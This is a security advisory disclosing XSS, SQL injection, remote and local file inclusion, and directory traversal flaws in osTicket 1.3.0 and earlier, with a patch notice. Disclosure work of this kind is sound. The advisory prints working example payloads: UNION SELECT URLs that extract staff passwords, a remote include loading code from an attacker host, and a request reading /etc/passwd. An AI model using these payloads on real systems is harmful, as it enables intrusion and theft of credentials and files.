osTicket Multiple Vulnerabilities
Vendor: osTicket
Product: osTicket
Version: <= 1.3.0
Website: http://www.osticket.com/
BID: 13478
CVE: CVE-2005-1436 CVE-2005-1437 CVE-2005-1438 CVE-2005-1439
OSVDB: 16270 16271 16272 16273 16274 16275 16276 16277 16278 16279
SECUNIA: 15216
PACKETSTORM: 38546
Description:
osTicket is a widely-used open source support ticket system. It is a lightweight support ticket tool written mainly using PHP scripting language. There are several vulnerabilities in the osTicket software that may allow for an attacker to take control of the affected web server, disclose sensitive data from the database, or read arbitrary files. These issues have been reported to the developers and a new updated version of osTicket is available for download. All affected users should upgrade their osTicket installations immediately.


Cross Site Scripting:
Cross site scripting exists in osTicket. This vulnerability exists due to user supplied input not being checked properly.

http://example.com/view.php?e=test@test.com&t=480826[XSS]
http://example.com/include/header.php?osticket_title=%3C/title%3E[XSS]
http://example.com/include/admin_login.php?em=asdf[XSS]
http://example.com/include/user_login.php?e=asdf[XSS]
http://example.com/include/open_submit.php?err=[XSS]

This vulnerability could be used to steal cookie based authentication credentials within the scope of the current domain, or render hostile code in a victim's browser.


Script/HTML Injection:
When adding a ticket an attacker may include malicious script or html in the name and subject fields and have it rendered in the browser of anyone who views it (such as an admin) and may be used in part with CSRF to force users or admins to perform arbitrary commands.


SQL Injection:
osTicket is prone to two SQL Injection issues, one lies in the search engine, and one lies in viewing tickets. Below are a few examples.

http://example.com/admin.php?a=view&id=-99%20UNION%20SELECT%20username, password,0,0,0,0,0,0,0,0,0%20FROM%20ticket_reps%20WHERE%201/*

http://example.com/admin.php?a=view&id=-99%20UNION%20SELECT%20username, password,'your@email.org',0,0,0,0,0,0,0,0%20FROM%20ticket_reps%20WHERE%201/*

http://example.com/view.php?s=advanced&query=&cat=-99%20UNION%20SELECT %2031337,0,0,0,password%20FROM%20ticket_reps%20WHERE%20ID=5/*&status=& sort=ID&way=ASC&per=5&search_submit=Search

The first example is not that easy to exploit, and the example I have given only works if you are logged in as admin. Why is this? Let's have a look at includes/viewticket.php

//user is allowed to view ticket
$show = $_SESSION[user][type] == "admin" ? 1: !$cat_row[hidden];

$admin_permis = ($_SESSION[user][type] == "admin" and (@in_array($cat_row[ID], 
$oslogin[cat_access]) or $oslogin[cat_access][0] == "all" or $oslogin[ID] == 
ADMIN));
$client_permis = ($_SESSION[user][type] == "client" and $ticket_row[email] == 
$_SESSION[user][id]);

if (!$client_permis and !$admin_permis) {
	echo "Access denied.";
}


As we can see from this code we might be able to influence $ticket_row[email] directly from the query string if magic_quotes_gpc is off, but a lot of the time it is on. If an attacker cannot influence the returned email address during a UNION SELECT then he can do something like SELECT into an outfile or try to enumerate data using built in MySQL functions. This issue is exploitable, just not as easy as some SQL Injection issues to exploit because if a certain criteria isn't returned then you are denied access. The search engine issue on the other hand is pretty run of the mill and not hard for an attacker to exploit. An attacker needs to be logged in with at least a user account to exploit these issues.


File Include Vulnerability:
osTicket is prone to both remote and local file include vulnerabilities which may allow for an attacker to execute arbitrary commands on the victim webserver by including malicious files. Lets have a look at the vulnerable file which is titled "include/main.php"

if ($config[search_disp]) {
	include("$include_dir/search.php");
}


If globals are set to on, and no include restrictions are in effect then we can include any php code of our choice remotely. Of course the hosting the malicious file to be included could not have php enabled, or the file would be parsed before it reached the victim server.

http://example.com/include/main.php?config[search_disp]=true&include_dir=http://attacker

This issue is very dangerous when present, but regardless of your server configuration you are still encouraged to upgrade immediately.


Directory Traversal Vulnerability:
There is a directory traversal issue within the attachments.php script used by osTicket. The good news is that this vulnerability only exists when the user has activated file uploads (which has to be done manually and is not present by default), but it should be noted that even if the attachments have not been activated the error messages outputted by this script still cause for a cross site scripting issue. Below is an example.

http://example.com/attachments.php?file=../../../../../../../etc/passwd

This vulnerability can be used to retrieve arbitrary files on the target webserver, and may aid in further attacking a vulnerable system.


Solution:
The developer was contacted in early April, and a patch has been developed and should be available now.


Credits:
James Bercegay of the GulfTech Security Research Team